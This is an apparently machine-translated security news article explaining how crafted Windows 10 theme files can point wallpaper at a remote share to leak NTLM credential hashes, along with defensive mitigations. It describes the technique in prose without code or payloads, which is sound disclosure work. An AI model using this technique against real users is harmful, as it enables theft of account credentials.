Tuesday, January 19, 03:24
Home security Windows 10 themes are used to steal credentials

Windows 10 themes are used to steal credentials

Windows 10 Themes
Windows 10 themes are used to steal credentials

Specially designed themes for Windows 10 can be used in attacks "Pass-the-Hash" to steal credentials from Windows accounts unsuspecting users.

Windows allows users to create custom themes that contain colors, sounds, mouse cursors, and wallpaper that the operating system uses.

The users Windows can then change themes to change the look of the operating system.

Windows 10 themes are used to steal credentials

The settings of a theme are saved in the folder % AppData% \ Microsoft \ Windows \ Themes, as a file with a .theme extension (eg "Custom Dark.theme").

Windows themes can then be shared with others users right-click on an active theme and select "Save theme for sharing", which will make the theme in file ".Deskthemepack".

These desktop theme packages can then be be notified via e-mail or as downloads on websites and be installed by double-clicking on them.

But the security researcher Jimmy Bayne (@bohops) revealed that specially designed Windows themes could be used for execution of Pass-the-Hash attacks.

Pass-the-Hash attacks are used for Windows credentials theft (login names and password hashes), tricking the user into connecting to a remote one server file sharing, which needs login confirmation.

Upon acquisition access, Windows will automatically try to connect to the remote system by sending the user login name and an NTLM hash of the password.

In a Pass-the-Hash attack, the credentials sent are collected by them hackers, who then try to do password dehash to access the login name and password of the users.

Dehashing an easy password can be done in a matter of seconds.

In the new method discovered by Bayne, an attacker can create a specially designed .theme file and change the desktop wallpaper setting to use a system which requires remote authentication.

The user details are then sent in the manner described above. The attacker can collect credentials and do dehashing using special scripts.

As Microsoft moves away from local Windows 10 accounts, remote intruders can use this attack to more easily access the thousands of remote services offered by Microsoft.

This includes possible access to e-mail, Azure or in corporate networks, remotely.

Bayne said he revealed the attack to Microsoft earlier this year, but was told it would not be fixed, as it is "design-specific".

Windows malware protection

Bayne recommended excluding extensions: .theme, .themepack and .desktopthemepackfile. However, this will shut down "Windows 10 Themes", So users can only do this if they do not need to move on to another topic.

Windows 10 users can also use “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers”And set it to“Deny AllTo prevent NTLM credentials from being sent remotely systems.

Windows 10 themes are used to steal credentials

Finally, the multi-factor authentication application in Microsoft accounts is a good practice to prevent it access third parties in the account.


Please enter your comment!
Please enter your name here

Digital Fortress
Digital Fortresshttps://www.secnews.gr
Pursue Your Dreams & Live!



FCC: Extremists turn to radio equipment after banning from social media

The US government warns that extremists could turn to radio equipment to plan their future attacks, ...

Android: How to make Signal the default messaging app

Signal is a popular encrypted messaging application that focuses on privacy. It is an alternative to ...

Google Cloud: We use some SolarWinds, but we were not affected by the hack

Google Cloud CISO Phil Venables has revealed that the cloud uses software from the vendor, SolarWinds, but states that the use ...

Scotland Environment Service: ransomware continues to affect us

The Scottish Environmental Protection Agency (SEPA) has confirmed that it was hit by a ransomware attack last month and continues to face ...

Backdoors and vulnerabilities were discovered in FiberHome routers

Backdoors and other vulnerabilities have been discovered in the firmware of a popular FiberHome FTTH ONT router. FTTH ONT stands for Fiber-to-the-Home Optical Network ...

GitHub apologizes to an employee who fired! What happened;

GitHub has admitted that it was wrong to fire a Jewish official who made "anti-Nazi" comments about the Capitol riots.

By 2030 AI will replace the people of cybersecurity

Security company Trend Micro recently conducted a new survey that reveals that more than two-fifths (41%) of IT leaders believe ...

Chinese Winnti APT targets organizations in Russia and other countries!

Security researchers at Positive Technologies have uncovered a series of attacks carried out by a Chinese APT hacking team targeting organizations in Russia ...

Silicon Valley is investing a huge amount of money in India

From March to November, even when COVID-19 destroyed economies around the world, the richest man in India ...

Microsoft, Salesforce, Oracle are designing a digital vaccination passport

A Covid digital vaccination passport is being developed jointly by a team of health and technology companies, as well as governments, airlines and ...